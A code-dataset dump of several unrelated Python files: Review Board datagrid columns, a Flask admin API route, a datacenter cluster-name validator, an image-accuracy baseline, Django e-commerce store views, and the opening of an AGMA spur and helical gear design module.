'verification',\n '%(verifying_issue_count)d issues requiring '\n 'verification',\n verifying_issues)\n % {\n 'verifying_issue_count': verifying_issues,\n }\n ))\n elif review_request.shipit_count:\n container_css_classes = ['shipit-count-container']\n\n if (review_request.last_review_activity_timestamp and\n review_request.last_updated and\n (review_request.last_review_activity_timestamp <\n review_request.last_updated)):\n container_css_classes.append('-is-stale')\n aria_label = ngettext(\n \"%(shipit_count)d Ship It! (New updates to review)\",\n \"%(shipit_count)d Ship It's! (New updates to review)\",\n review_request.shipit_count)\n else:\n aria_label = ngettext(\n \"%(shipit_count)d Ship It!\",\n \"%(shipit_count)d Ship It's!\",\n review_request.shipit_count)\n\n return self._render_counts(\n [{\n 'count': review_request.shipit_count,\n 'css_class': 'shipit-count',\n 'icon_name': 'shipit',\n }],\n aria_label=aria_label % {\n 'shipit_count': review_request.shipit_count,\n },\n container_css_class=' '.join(container_css_classes))\n else:\n return ''\n\n def _render_counts(self,\n count_details,\n aria_label,\n container_css_class='issue-count-container'):\n \"\"\"Render the counts for the column.\n\n This will render a container bubble in the column and render each\n provided count and icon in the bubble. This can be used for issues,\n Ship Its, or anything else we need down the road.\n\n Version Added:\n 5.0:\n * Added ``aria_label``.\n * Removed the ``title`` key from ``count_details``.\n\n Args:\n count_details (list of dict):\n The list of details for the count. Each supports the following\n keys:\n\n Keys:\n count (int):\n The count to show for the indicator.\n\n css_class (unicode, optional):\n The CSS class to use for the indicator.\n\n icon_name (unicode, optional):\n The name of the icon to use for the indicator.\n\n aria_label (unicode):\n The label to use for the ``aria-label`` attribute and the\n ``title`` attribute.\n\n container_css_class (unicode, optional):\n The optional CSS class name for the outer container.\n\n Returns:\n django.utils.safestring.SafeText:\n The resulting HTML for the counts bubble.\n \"\"\"\n # Note that the HTML is very whitespace-sensitive, so don't try to\n # change the templates to be nicely indented. The spacing is this way\n # for a reason.\n #\n # We also can't use format_html_join, unfortunately, as that doesn't\n # support keyword arguments.\n return format_html(\n '
    '\n '{count_html}'\n '
    ',\n aria_label=aria_label,\n container_css_class=container_css_class,\n count_html=mark_safe(''.join(\n format_html(\n ''\n ''\n ''\n '{count}'\n '',\n **dict({\n 'css_class': 'issue-count',\n 'icon_name': 'open-issues',\n }, **count_detail))\n for count_detail in count_details\n )))\n\n\nclass SummaryColumn(Column):\n \"\"\"Shows the summary of a review request.\n\n This will also prepend the draft/submitted/discarded state, if any,\n to the summary.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(SummaryColumn, self).__init__(\n label=_('Summary'),\n expand=True,\n link=True,\n link_css_class='review-request-link',\n css_class='summary',\n sortable=True,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_anonymous:\n return queryset\n\n return queryset.extra(select={\n 'draft_summary': \"\"\"\n SELECT reviews_reviewrequestdraft.summary\n FROM reviews_reviewrequestdraft\n WHERE reviews_reviewrequestdraft.review_request_id =\n reviews_reviewrequest.id\n \"\"\",\n 'visibility': \"\"\"\n SELECT accounts_reviewrequestvisit.visibility\n FROM accounts_reviewrequestvisit\n WHERE accounts_reviewrequestvisit.review_request_id =\n reviews_reviewrequest.id\n AND accounts_reviewrequestvisit.user_id = %(user_id)s\n \"\"\" % {\n 'user_id': str(user.id)\n }\n })\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\n\n Args:\n state (djblets.datagrids.grids.StatefulColumn):\n The state for the datagrid.\n\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request.\n\n Returns:\n django.utils.safestring.SafeText:\n The rendered column.\n \"\"\"\n summary = review_request.summary\n labels = []\n\n if review_request.submitter_id == state.datagrid.request.user.id:\n if review_request.draft_summary is not None:\n summary = review_request.draft_summary\n labels.append(('label-draft', _('Draft')))\n elif (not review_request.public and\n review_request.status == ReviewRequest.PENDING_REVIEW):\n labels.append(('label-draft', _('Draft')))\n\n # review_request.visibility is not defined when the user is not\n # logged in.\n if state.datagrid.request.user.is_authenticated:\n if review_request.visibility == ReviewRequestVisit.ARCHIVED:\n labels.append(('label-archived', _('Archived')))\n elif review_request.visibility == ReviewRequestVisit.MUTED:\n labels.append(('label-muted', _('Muted')))\n\n if review_request.status == ReviewRequest.SUBMITTED:\n labels.append(('label-submitted', _('Submitted')))\n elif review_request.status == ReviewRequest.DISCARDED:\n labels.append(('label-discarded', _('Discarded')))\n\n result = [\n format_html_join('', '', labels)\n ]\n\n if summary:\n result.append(format_html('{0}', summary))\n else:\n result.append(format_html('{0}',\n _('No Summary')))\n\n return mark_safe(''.join(result))\n\n\nclass ReviewSummaryColumn(SummaryColumn):\n \"\"\"Shows the summary of the review request of a review.\n\n This does not (yet) prepend the draft/submitted/discarded state, if any,\n to the summary.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(SummaryColumn, self).__init__(\n label=_('Review Request Summary'),\n expand=True,\n link=True,\n css_class='summary',\n *args, **kwargs)\n\n def render_data(self, state, review):\n \"\"\"Return the rendered contents of the column.\"\"\"\n return conditional_escape(review.review_request.summary)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n return queryset.select_related('review_request')\n\n\nclass ToMeColumn(Column):\n \"\"\"Indicates if the user is requested to review the change.\n\n This will show an indicator if the user is on the Target People reviewers\n list.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n raquo = '\\u00BB'\n\n super(ToMeColumn, self).__init__(\n label=raquo,\n detailed_label=_('To Me'),\n detailed_label_html=(gettext('%s To Me') % raquo),\n shrink=True,\n *args, **kwargs)\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\"\"\"\n user = state.datagrid.request.user\n\n if user.is_authenticated:\n state.all_to_me = set(\n user.directed_review_requests.filter(\n pk__in=state.datagrid.id_list).values_list('pk',\n flat=True))\n else:\n state.all_to_me = set()\n\n return queryset\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n if review_request.pk in state.all_to_me:\n return ('
    »
    '\n % (self.detailed_label))\n\n return ''\n\n\nclass DiffSizeColumn(Column):\n \"\"\"Indicates line add/delete counts for the latest diffset.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the column.\"\"\"\n super(DiffSizeColumn, self).__init__(\n label=_('Diff Size'),\n sortable=False,\n shrink=True,\n *args, **kwargs)\n\n def render_data(self, state, review_request):\n \"\"\"Return the rendered contents of the column.\"\"\"\n if review_request.repository_id is None:\n return ''\n\n diffsets = list(review_request.diffset_history.diffsets.all())\n\n if not diffsets:\n return ''\n\n diffset = diffsets[-1]\n\n counts = diffset.get_total_line_counts()\n insert_count = counts.get('raw_insert_count')\n delete_count = counts.get('raw_delete_count')\n result = []\n\n if insert_count:\n result.append('+%d' %\n insert_count)\n\n if delete_count:\n result.append('-%d' %\n delete_count)\n\n if result:\n return ' '.join(result)\n\n return ''\n\n def augment_queryset(self, state, queryset):\n \"\"\"Add additional queries to the queryset.\n\n This will prefetch the diffsets and filediffs needed to perform the\n line calculations.\n\n Args:\n state (djblets.datagrid.grids.StatefulColumn):\n The column state.\n\n queryset (django.db.models.query.QuerySet):\n The queryset to augment.\n\n Returns:\n django.db.models.query.QuerySet:\n The resulting queryset.\n \"\"\"\n # TODO: Update this to fetch only the specific fields when we move\n # to a newer version of Django.\n return queryset.prefetch_related('diffset_history__diffsets',\n 'diffset_history__diffsets__files')\n","repo_name":"reviewboard/reviewboard","sub_path":"reviewboard/datagrids/columns.py","file_name":"columns.py","file_ext":"py","file_size_in_byte":39695,"program_lang":"python","lang":"en","doc_type":"code","stars":1513,"dataset":"github-code","pt":"34"} +{"seq_id":"31446826967","text":"from flask import request, jsonify, abort\nfrom . import api_v1\nfrom app import db, csrf\nfrom app.models.users import Usuario\nfrom app.models.places import Colonia\n\n@api_v1.route('/api/v1/acceso', methods=['POST'])\n@csrf.exempt\n@Usuario.token_required\ndef api_v1_post_colonia(current_user):\n\tif not current_user.admin : return abort(403)\n\tnombre = request.json['nombre']\n\tmunicipio = request.json['municipio']\n\tcp = request.json['cp']\n\tasentamiento = request.json['asentamiento']\n\tzona = request.json['zona']\n\n\tbuscar = Colonia.query.filter_by(fk_cp=cp).all()\n\tcontinuar = False\n\n\tfor i in buscar:\n\t\tif i.fk_municipio == int(municipio):\n\t\t\tcontinuar = True\n\t\t\tbreak\n\n\tif continuar:\t\t\n\t\tfor i in buscar:\n\t\t\tif i.nombre == nombre:\n\t\t\t\tcontinuar = False\n\t\t\t\tbreak\n\t\t\t\t\t\n\t\tif continuar:\t\n\t\t\tregistro = Colonia(nombre=nombre, fk_municipio=municipio, fk_cp=cp, fk_asentamiento=asentamiento, \n\t\t\t\t\t\t\t\tfk_zona=zona)\n\t\t\tdb.session.add(registro)\n\t\t\tdb.session.commit()\n\n\t\t\treturn jsonify({'result': 'Registro exitoso'})\t\n\t\telse:\n\t\t\treturn jsonify({'result': 'Colonia ya registrada'})\t\n\telse:\n\t\treturn jsonify({'result': 'El CP no pertenece al municipio ingresado'})\t\t\t\n","repo_name":"litocmvp/prueba_tecnica_1","sub_path":"app/routes/api/v1/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17598284630","text":"class Datacenter:\n def __init__(self, name, cluster_list):\n \"\"\"\n Constructor for Datacenter data structure.\n\n self.name -> str\n self.clusters -> list(Cluster)\n \"\"\"\n self.name = name\n self.cluster_list = cluster_list\n\n def _is_valid_cluster_name(self, cluster_name):\n parts = cluster_name.split('-')\n if len(parts) == 2:\n part1 = parts[0]\n if part1 and part1 == (self.name[:3]).upper():\n part2 = parts[1]\n if part2 and part2.isdigit() and len(part2) in range(1, 4):\n return True\n return False\n\n def remove_invalid_clusters(self):\n new_cluster_list = []\n for cluster in self.cluster_list:\n if self._is_valid_cluster_name(cluster.name):\n new_cluster_list += [cluster]\n self.cluster_list = new_cluster_list\n","repo_name":"georgespanac/ro_interview_assignment_vodafone","sub_path":"data_structures/datacenter.py","file_name":"datacenter.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3133140586","text":"import cv2\nimport numpy as np\n\n\ndef baseline_model(corr_masks, uncorrected_masks, img_list, msk_list):\n \"\"\"Calculates the accuracy based on the pixel-vice difference between images\n\n Args:\n corr_masks (_type_): _description_\n uncorrected_masks (_type_): _description_\n img_list (_type_): _description_\n msk_list (_type_): _description_\n \"\"\"\n list = []\n for i in range(len(img_list)):\n img_1 = cv2.imread(corr_masks + img_list[i], 1)\n img_2 = cv2.imread(uncorrected_masks + msk_list[i], 1)\n\n res = cv2.absdiff(img_1, img_2)\n res = res.astype(np.uint8)\n percentage = np.round(100 - ((np.count_nonzero(res) * 100) / res.size), 2)\n list.append(percentage)\n print(f\"The mean accuracy is equal to {round(np.mean(list), 2)}\")\n print(f\"These are the accuracies of the individual images{list}\")\n","repo_name":"aaronlakeman/pore-type-segmentation-unet","sub_path":"modeling/baseline_model.py","file_name":"baseline_model.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"9606284003","text":"from django.shortcuts import render,get_object_or_404,HttpResponse\nfrom .models import Product,Variation\nfrom cart.models import Cart,CartIteam\nfrom cart.views import _get_cart_id\nfrom category.models import Category\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\n\ndef store(request,category_slug=None):\n\n products_count=0\n if category_slug != None:\n categories = get_object_or_404(Category,cat_slug=category_slug)\n products = Product.objects.all().filter(category=categories,is_available= True).order_by('id')\n products_count = len(products)\n page_obj = Paginator(products,3)\n page_number = request.GET.get(\"page\")\n products_page = page_obj.get_page(page_number)\n\n else :\n products = Product.objects.all().filter(is_available= True)\n products_count = len(products)\n page_obj = Paginator(products,3)\n page_number = request.GET.get(\"page\")\n products_page = page_obj.get_page(page_number)\n\n\n context = {\n 'products' : products_page,\n 'products_count':products_count,\n }\n return render(request,'store.html',context)\n\n\ndef product_detail(request,category_slug,product_slug):\n\n products = Product.objects.get(category__cat_slug=category_slug,slug=product_slug)\n\n context ={\n 'product' : products,\n\n }\n return render(request,'product-detail.html',context)\n\n\ndef search(request,products=None,products_count=0):\n if request.method == 'GET':\n keyword = request.GET.get('keyword')\n try:\n if keyword :\n products = Product.objects.filter(Q(product_name__icontains=keyword) | Q(description__icontains=keyword)).order_by('-created_at')\n products_count = len(products)\n except :\n print('\\033[1;31;40m Error in search \\033[0;0m')\n pass\n\n\n context = {\n 'products' : products,\n 'products_count':products_count,\n }\n return render(request,'store.html',context)","repo_name":"kumarrameg/greatkart","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9760671175","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 16 17:00:54 2022\r\n\r\n@author: valte\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math as mt\r\nfrom ..Units import SI,rad_velocity,m2ft,ft2m,lbf2N,N2lbf\r\n\r\ndef Tr_from_H(H,n,unit = \"RPM\"):\r\n \"\"\"\r\n Calcula o torque em Nm baseado na rotação e potência.\r\n\r\n Parameters\r\n ----------\r\n H : float\r\n Potência de eixo, em W (Entrar em kW implica saída em Nmm).\r\n n : float\r\n Rotação do eixo. Unidades RPM ou rad/s. Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n Tr : float\r\n Torque no eixo.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s')\r\n Tr = H/omega\r\n return Tr\r\n\r\ndef H_from_Tr(Tr,n,unit = \"RPM\"):\r\n \"\"\"\r\n Calcula a potência no eixo a partir do torque\r\n\r\n Parameters\r\n ----------\r\n Tr : Float\r\n Torque em Nm (Valores em Nmm resultam em H em kW).\r\n n : float\r\n Rotação do eixo. Unidades RPM ou rad/s. Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n H : FLoat\r\n Potência.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s') \r\n H = Tr*omega\r\n return H\r\n\r\ndef Wt_from_Tr(Tr,d):\r\n \"\"\"\r\n Calcula a carga transversal na engrenagem a partir do torque\r\n\r\n Parameters\r\n ----------\r\n Tr : Float\r\n Torque.\r\n d : Float\r\n Diametro nominal da engrenagem.\r\n\r\n Returns\r\n -------\r\n W_t : Float\r\n Carga transversal.\r\n\r\n \"\"\"\r\n W_t = 2*Tr/d\r\n return W_t\r\n\r\ndef Wt_from_H(H,d,n,unit=\"RPM\"):\r\n \"\"\"\r\n Força tranversal na engrenagem a partir da potência de eixo\r\n\r\n Parameters\r\n ----------\r\n H : float\r\n Potência de eixo, em W (Entrar em kW implica saída em Nmm).\r\n d : Float\r\n Diametro nominal da engrenagem.\r\n n : Float\r\n Rotação do eixo. Unidades RPM ou rad/s. Deve-se indicar a unidade utili\r\n zando o parâmetro `unit`\r\n unit : str, optional\r\n Unidade da rotação. The default is \"RPM\".\r\n\r\n Returns\r\n -------\r\n W_t : Float\r\n Força transversal.\r\n\r\n \"\"\"\r\n omega = rad_velocity(n,input_unit=unit,output_unit='rad/s')\r\n W_t = 2*H/(omega*d)\r\n return W_t\r\n\r\n\r\ndef adendum(P):\r\n return 1/P\r\n\r\ndef dedendum(P):\r\n return 1.25/P\r\n\r\ndef pitch_diam(m,N):\r\n return m*N\r\n\r\ndef base_thicknes(m):\r\n P = 1/m\r\n p = np.pi/P\r\n \r\n return p/2\r\n\r\ndef min_pinion_N(m,k=1,phi=20):\r\n \"\"\"\r\n Calcula o mínimo número de dentes no pinhão para evitar interferência\r\n\r\n Parameters\r\n ----------\r\n m : float\r\n Módulo transversa.\r\n k : TYPE, optional\r\n DESCRIPTION. The default is 1.\r\n phi : float, optional\r\n Angulo de pressão. The default is 20.\r\n\r\n Returns\r\n -------\r\n N: int\r\n Mínimo número de dentes do pinhão.\r\n\r\n \"\"\"\r\n phi = np.deg2rad(phi)\r\n return mt.ceil((2*k/((1+2*m)*np.sin(phi)**2))*(m+np.sqrt(m**2+(1+2*m)*np.sin(phi)**2)))\r\n\r\n\r\n\r\nclass SpurAGMA():\r\n \"\"\"\r\n Modela engrenagens cilíndricas de dentes retos e helicoidais conforme \r\n metodologia da AGMA.\r\n\r\n Parameters\r\n ----------\r\n F : float\r\n Largura de face em mm.\r\n P_t : float\r\n Passo transversal em mm.\r\n N_p : int\r\n N° de dentes do Pinhão.\r\n N_g : int\r\n N° de dentes da Coroa.\r\n poisson_p : float\r\n Coeficiente de Poisson do Material do Pinhão.\r\n poisson_g : float\r\n Coeficiente de Poisson do Material da Coroa.\r\n E_p : float\r\n Módulo de Young em GPa do Material do Pinhão.\r\n E_g : float\r\n Módulo de Young em GPa do Material da Coroa.\r\n Q_v : float\r\n Número de qualidade.\r\n n_p : TYPE\r\n DESCRIPTION.\r\n n_g : TYPE\r\n DESCRIPTION.\r\n N_cyc : int\r\n Número de ciclos para vida em fadiga.\r\n H_Bp : float\r\n Dureza Brinnel do pinhão.\r\n H_Bg : float\r\n Dureza Brinnel da Coroa.\r\n N_c : int, optional\r\n Número de dentes da cremalheira de fabricação. The default is 9999.\r\n r_c : float, optional\r\n Raio nominal da cremalheria de fabricação. The default is None.\r\n a_0 : float, optional\r\n Adendo admensional da cremalheira de fabricação. The default is 1.25.\r\n b_0 : float, optional\r\n Dedendo adimensional da cremalheira de fabricação. The default is 1.\r\n rho_a0 : TYPE, optional\r\n Raio de adoçamento da cremalheira de fabricação. The default is 0.25.\r\n x_0 :float, optional\r\n Folga adimensional de \"backlash\" da cremalheira de fabricação. The default is 0.\r\n phi_n : float, optional\r\n Angulo de pressão em deg. The default is 20.\r\n psi : float, optional\r\n Angulo de hélice em deg. The default is 0.\r\n delta_s_n : float, optional\r\n Parametro de modificação do dente. The default is 0.024.\r\n x : float, optional\r\n Modificador de adendo do dente. The default is 0.\r\n load : str, optional\r\n Ponto de carregamento do dente: 'tip' para ponta ou 'HPSTC' para \r\n o ponto mais alto de contato em um único dente. The default is \"tip\".\r\n orientation : str, optional\r\n Tipo de engrenagem. 'internal' para internas e 'external' \r\n para externas. The default is 'external'.\r\n coroamento : bol, optional\r\n Define se há uso de coroamento nos dentes. The default is False.\r\n detrimento_superficie : bol, optional\r\n Define se há presenseça de detrimento superfiical. The default is False.\r\n engrenamento : str, optional\r\n Define o tipo de engrenamento.\r\n -1 ou 'aberto': engranamento aberto;\r\n -2 ou 'fecahdo comercial': Unidades fechadas comerciais;\r\n -3 ou 'fechado preciso': Unidades fechadas de precisão;\r\n -4 ou 'fechado extra-preciso': Unidades fechadas extra-precisas.\r\n O padrão é 'aberto'.\r\n montagem_ajustada: bool, optional\r\n Define o tipo de mntagem. O padrão é Falso.\r\n tratamento : str, optional\r\n Define o tipo de tratamento superficial. The default is 'None'.\r\n fonte_potencia : str, optional\r\n Define o nível de choque esperado na fonte. The default is 'uniforme'.\r\n choque_maquina : str, optional\r\n Define o nível de choque esperado na máquina. The default is 'uniforme'.\r\n trust : float, optional\r\n Define o nível de confialbilidade adotado. The default is 99.99.\r\n temperatura : float, optional\r\n Temperatura de operação em °C. The default is 20.\r\n\r\n\r\n\r\n \"\"\"\r\n def __init__(self,F,P_t,N_p,N_g,\r\n poisson_p,poisson_g,E_p,E_g,\r\n Q_v, n_p, n_g, N_cyc,\r\n H_Bp,H_Bg,\r\n N_c=9999,r_c=None,a_0 = 1.25,b_0=1,rho_a0=0.25,x_0 = 0,\r\n phi_n=20,psi=0,\r\n delta_s_n=0.024,x=0,\r\n load = \"tip\", orientation = 'external',\r\n coroamento = False, detrimento_superficie = False, \r\n engrenamento = 'aberto',montagem_ajustada=False,tratamento = 'None',\r\n fonte_potencia = 'uniforme', choque_maquina = 'uniforme',\r\n trust = 99.99, temperatura = 20):\r\n\r\n\r\n \r\n self.P = P_t\r\n self.F = F\r\n self.N_g = N_g\r\n self.N_p = N_p\r\n self.poisson_p = poisson_p\r\n self.poisson_g = poisson_g\r\n self.E_p = E_p*1e3\r\n self.E_g = E_g*1e3\r\n self.Q_v = Q_v\r\n self.n_p = n_p\r\n self.N_cyc = N_cyc\r\n self.H_Bp = H_Bp\r\n self.H_Bg = H_Bg\r\n self.phi_n = np.deg2rad(phi_n)\r\n self.psi = psi\r\n self.x = x\r\n self.delta_s_n = delta_s_n\r\n self.N_c = N_c\r\n self.rho_a0 = rho_a0\r\n self.loaf = load\r\n self.coroamento = coroamento \r\n self.engrenamento = engrenamento\r\n self.montagem_ajustada = montagem_ajustada\r\n \r\n phi_n = np.deg2rad(phi_n)\r\n psi = np.deg2rad(psi)\r\n\r\n phi = np.arctan2(np.tan(phi_n),np.cos(psi))\r\n P = P_t/np.cos(psi)\r\n \r\n F = F*P #adimensional\r\n delta_s_n = F*delta_s_n\r\n \r\n #if psi == 0:\r\n m_g = N_g/N_p\r\n \r\n n_g = n_p/m_g\r\n \r\n self.n_g = n_g\r\n \r\n if r_c == None:\r\n r_c = N_c/(2*np.cos(psi))\r\n r_bc = r_c-b_0\r\n\r\n \r\n \"Dimensões Pinhão\"\r\n r_n = N_p/(2*np.cos(psi))\r\n a = P*adendum(P)\r\n b = P*dedendum(P)\r\n\r\n x_g = x - (delta_s_n)/(2*np.tan(phi_n))\r\n s_n = np.pi/2 + 2*x_g*np.tan(phi_n)\r\n \r\n r_a = (N_p/np.cos(psi) + 2*(1+x))/2\r\n r_b = r_n*np.cos(phi)\r\n\r\n self.r_n = r_n\r\n self.a = a\r\n self.b = b\r\n self.r_a = r_a\r\n\r\n self.r_b = r_b\r\n\r\n self.s_n = s_n\r\n \r\n \r\n \r\n \"Dimensões Coroa\"\r\n r_n2 = r_n*m_g\r\n a_2 = 1\r\n b_2 = 1.25\r\n c_2 = b_2-a_2\r\n r_r2 = r_n2-b_2\r\n r_b2 = r_b*m_g\r\n r_f2 = r_r2+c_2\r\n \r\n r_a2 = (N_g/np.cos(psi) + 2*(1-x))/2\r\n \r\n self.r_n2 = r_n2\r\n self.a_2 = a_2\r\n self.b_2 = b_2\r\n self.r_a2 = r_a2\r\n self.r_r2 = r_r2\r\n self.r_b2 = r_b2\r\n self.r_f2 = r_f2\r\n\r\n \r\n\r\n \r\n \"Perfil de Involuta\"\r\n \r\n C_r = (N_p+N_g)/(2*np.cos(psi))\r\n phi_r = (np.arccos((r_b2+r_b)/C_r) if orientation == 'external' \r\n else np.arccos((r_b2-r_b)/C_r))\r\n p_n = np.pi*np.cos(phi_n)\r\n p_b = 2*np.pi*r_b/N_p\r\n psi_b = np.arccos(p_n/p_b)\r\n \r\n \r\n C_6 = C_r*np.sin(phi_r)\r\n C_1 = (C_6 - (r_a2**2-r_b2**2)**0.5 if orientation == 'external' \r\n else -(C_6 - (r_a2**2-r_b2**2)**0.5))\r\n C_3 = (C_6/(m_g+1) if orientation == 'external' \r\n else C_6/(m_g-1))\r\n C_4 = C_1+p_b\r\n C_5 = (r_a**2-r_b**2)**0.5\r\n C_2 = C_5-p_b\r\n \r\n Z = C_5-C_1\r\n m_p = Z/p_b\r\n \r\n p_x = np.pi/np.sin(psi) if psi!=0 else 0\r\n \r\n m_F = F/p_x if psi!=0 else 0\r\n \r\n self.phi_r = phi_r\r\n self.psi_b = psi_b\r\n self.C_1 = C_1\r\n self.C_2 = C_2\r\n self.C_3 = C_3\r\n self.C_4 = C_4\r\n self.C_5 = C_5\r\n self.C_6 = C_6\r\n self.C_r = C_r\r\n self.Z= Z\r\n self.m_F = m_F\r\n self.m_p = m_p\r\n self.p_x = p_x\r\n \r\n \"Comprimento Mínimo das Linhas de Contato\"\r\n \r\n n_r = m_p%1\r\n n_a = m_F%1\r\n \r\n if psi == 0: #para engrenagens de dentes retor\r\n L_min = F\r\n \r\n elif n_a<=1-n_r: #engrenagens helicoidais\r\n L_min = (m_p*F-n_a*n_r*p_x)/np.cos(psi_b)\r\n else:\r\n L_min = (m_p*F-(1-n_a)*(1-n_r)*p_x)/np.cos(psi_b)\r\n \r\n \"Partilhamento de Carga\" \r\n m_N = F/L_min\r\n \r\n \"Angulo de Hélice de Operação\"\r\n psi_r = np.arctan(np.tan(psi_b)/np.cos(phi_r))\r\n phi_nr = np.arcsin(np.cos(psi_b)*np.sin(phi_r))\r\n \r\n \r\n \"Fator geométrico de resistência superficial I\"\r\n d = ((2*C_r)/(m_g+1) if orientation == 'external'\r\n else (2*C_r)/(m_g-1))\r\n \r\n r_m1 = ((1/2)*(r_a+(C_r-r_a2)) if orientation== 'external'\r\n else (1/2)*(r_a-(C_r-r_a2)))\r\n \r\n \"Raios de Giração\"\r\n if psi!=0 and m_F > 1:\r\n rho_1 = (r_m1**2 - r_b**2)**0.5\r\n rho_2 = (C_6 - rho_1 if orientation=='external'\r\n else C_6 + rho_1 )\r\n \r\n else:\r\n rho_1 = C_2\r\n rho_2 = (C_6 - rho_1 if orientation == 'external'\r\n else C_6 + rho_1)\r\n self.rho_1 = rho_1\r\n self.rho_2 = rho_2\r\n \r\n \"Fator de Sobreposição Helicoidal\"\r\n if psi!=0 and m_F < 1:\r\n rho_m1 = (r_m1**2 - r_b**2)**0.5\r\n rho_m2 = (C_6 - rho_1 if orientation=='external'\r\n else C_6 + rho_1)\r\n \r\n C_psi = (1-m_F*(1-(rho_m1*rho_m2*Z)/(rho_1*rho_2*p_n)))**0.5\r\n self.rho_m1 = rho_m1\r\n self.rho_m2 = rho_m2\r\n \r\n else:\r\n C_psi = 1\r\n \r\n \r\n self.C_psi = C_psi\r\n \r\n \r\n I = ((np.cos(phi_r)*C_psi**2)/\r\n (((1/rho_1)+(1/rho_2))*d*m_N) if orientation == 'external'\r\n else (np.cos(phi_r)*C_psi**2)/\r\n (((1/rho_1)-(1/rho_2))*d*m_N))\r\n \r\n self.I = I\r\n \r\n\r\n \r\n \"Fator de geométrico de flexão J\"\r\n if psi!=0:\r\n N_1v = N_p/(np.cos(psi)**3)\r\n r_1v = N_1v/2\r\n r_b1v = r_1v*np.cos(phi_n)\r\n r_a1v = r_1v+r_a-r_n\r\n else:\r\n N_1v = N_p\r\n r_1v = r_n\r\n r_b1v = r_b\r\n \r\n \r\n r_2v = r_1v*m_g\r\n r_b2v = r_b1v*m_g\r\n r_a2v = r_2v+r_a2-r_n2\r\n \r\n \r\n C_6v = (r_b2v+r_b1v)*np.tan(phi_nr)\r\n C_1v = (C_6v-(r_a2v**2-r_b2v**2)**0.5)\r\n C_4v = C_1v+p_n\r\n \r\n\r\n \r\n self.phi_nr =phi_nr\r\n self.r_1v =r_1v\r\n self.r_b1v =r_b1v\r\n self.r_2v =r_2v\r\n self.r_a2v =r_a2v\r\n self.r_b2v =r_b2v\r\n self.C_1v = {}\r\n self.C_4v = {}\r\n self.C_6v = {} \r\n \r\n pinion_geometry = [N_p,r_n,r_a,r_b,n_p,'pinnion']\r\n gear_geometry = [N_g,r_n2,r_a2,r_b2,n_g,'gear']\r\n geometry_list = [pinion_geometry,\r\n gear_geometry]\r\n\r\n self.m_p = {}\r\n self.tan_phi_nW = {}\r\n self.r_bv = {}\r\n self.phi_nL = {}\r\n self.phi_line = {}\r\n self.phi_n = {}\r\n self.phi_ni = {}\r\n self.phi_ns = {}\r\n self.lambda_nF = {}\r\n self.alpha = {}\r\n self.mu_n0 = {}\r\n self.r_nL = {}\r\n self.r_n_line = {}\r\n self.r_n0_line = {}\r\n self.lambd = {}\r\n self.theta_n0 = {} \r\n self.theta_n = {} \r\n self.beta_n = {} \r\n self.eta_nF = {} \r\n self.xi_nF = {} \r\n self.h_f = {} \r\n self.K_F = {} \r\n self.K_S = {} \r\n self.convergence_flag = {} \r\n self.rho_min = {} \r\n self.s_f = {} \r\n self.H = {} \r\n self.L = {} \r\n self.M = {} \r\n self.K_f = {} \r\n self.Y = {} \r\n self.J = {}\r\n self.K_v = {}\r\n self.V = {}\r\n self.V_max = {}\r\n self.Y_lewis = {}\r\n self.K_s = {}\r\n \r\n for geometry in geometry_list:\r\n N_i = geometry[0]\r\n r_i = geometry[1]\r\n r_ai = geometry[2]\r\n r_bi = geometry[3]\r\n n_i = geometry[4]\r\n tag = geometry[5]\r\n \r\n #Angulo de Pressão no Ponto de Aplicação\r\n if (psi !=0 and m_F>1) or (psi == 0 and load == \"tip\"):\r\n tan_phi_nW = ((r_a1v/r_b1v)**2-1)**0.5\r\n else:\r\n tan_phi_nW = C_4v/r_b1v \r\n \r\n #Geometria virtual\r\n if psi!=0:\r\n N_v = N_i/(np.cos(psi)**3)\r\n r_v = N_v/2\r\n r_bv = r_v*np.cos(phi_n)\r\n\r\n else:\r\n N_v = N_i\r\n r_v = r_i\r\n r_bv = r_bi\r\n\r\n \"Virtual cutter tool, cremalheira - appendix D\"\r\n \r\n if psi != 0:\r\n N_0 = N_c/(np.cos(psi)**3)\r\n r_n0 = N_0/2\r\n r_nb0 = r_n0*np.cos(phi_n)\r\n\r\n else:\r\n N_0 = N_c\r\n r_n0 = r_c\r\n r_nb0 = r_bc\r\n \r\n\r\n self.x_0 = x_0\r\n s_n0= np.pi/2+2*x_0*np.tan(phi_n)\r\n 